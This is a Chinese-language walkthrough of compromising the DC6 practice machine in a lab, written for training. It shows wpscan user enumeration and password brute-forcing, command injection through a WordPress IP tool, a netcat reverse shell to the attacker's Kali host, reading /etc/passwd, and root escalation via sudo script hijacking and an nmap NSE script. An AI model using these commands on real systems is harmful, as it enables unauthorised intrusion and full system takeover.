1.环境准备下载DC6靶机导入VM然后设置为NAT模式kali也设置为NAT模式。2.信息收集扫描同网段下的ip找到192.168.204.147为DC6靶机的ip利用nmap扫描靶机ip得到开放了80端口和22端口访问该网页发现无法访问但是网址变成了wordy根据DC6的作者提示需要设置hosts文件加上格式为ip wordy编辑hosts文件加上192.168.204.147 wordy再次访问发现成功进入主页面发现没有什么关键信息于是利用dirsearch扫描网页目录发现有一个wp-login很可能是后台登录页面访问以后发现确实是不过我们没有用户名和密码3.漏洞挖掘wpscan --url http://wordy/ -e u 用wpscan工具扫描网站用户名发现有五个用户名将五个用户名放入user.txt中。根据官网的提示cat /usr/share/wordlists/rockyou.txt | grep k01 passwords.txt将密码词典中带有k01的密码放入passwords.txt中这样能够减少我们很多时间。wpscan --url http://wordy -U /home/kali/Desktop/user.txt -P /home/kali/Desktop/password.txt用户名和密码都被我放到了桌面用这段指令指定用户名和密码进行爆破成功爆破出mark的密码利用mark的账号密码进行登录可以在users中发现每个用户的权限信息。不过对我们作用并不是特别大我们得看有没有别的可利用的。在Activity monitor中我们发现有一个IP tools可以将ip地址转换。或许这是一种前台输入后台执行命令的输入框呢前端输入框有长度限制通过浏览器F12修改 maxlength 属性突破长度限制拼接执行系统命令。192.168.204.147cat /etc/passwd点击第一个按钮并不会出现结果但是点击第二个按钮lookup发现成功读取到了说明命令成功。那么就可以用这个方法进行反弹shell4.漏洞利用kali终端进行监听4444端口等待DC6的连接输入框中填入192.168.204.147 nc 192.168.204.128 4444 -e /bin/bash 用 拼接命令实现后台执行反弹shell。接着利用python -c import pty;pty.spawn(/bin/bash)将shell切换为交互式。查看该用户可以用sudo权限执行的命令发现没有5.进行提权在 /home/mark 目录下发现敏感文件从中获取graham用户的密码使用 su graham 切换用户。查询该用户可以用sudo权限执行的命令发现有一个可以无密码执行jens用户的特定的脚本既然如此我们或许可以给这个脚本动动手脚。/bin/bash放入该脚本中在执行以后能够得到jens用户的shell以jens用户的身份执行该脚本发现成功得到了jens用户的shell梅开二度继续看当前用户有哪些sudo权限指令可以执行发现可以以root身份无密码执行nmap命令在tmp文件夹中创建一个shell.nse脚本echo os.execute(/bin/bash) /tmp/shell.nse用这个指令写入脚本sudo nmap --script/tmp/shell.nse执行nmap的命令发现成功执行并且得到了root提权成功6.渗透复盘1. 信息收集 → 发现 80 端口 WordPress2. 修改 hosts 绑定域名正常访问网站3. wpscan 枚举用户 过滤密码字典爆破4. 后台 IP 工具存在命令执行反弹shell5. 提权链网页 → 拿到 WordPress 后台账号mark后台 IP 工具命令执行 → 拿到 www-data 权限的 shell在 /home/mark 下发现密码 → 切换为系统用户 grahamgraham 利用 sudo 劫持脚本 → 拿到 jensjens 利用 sudo nmap 脚本提权 → 拿到 root6. 拿下 root获取 flag通关完结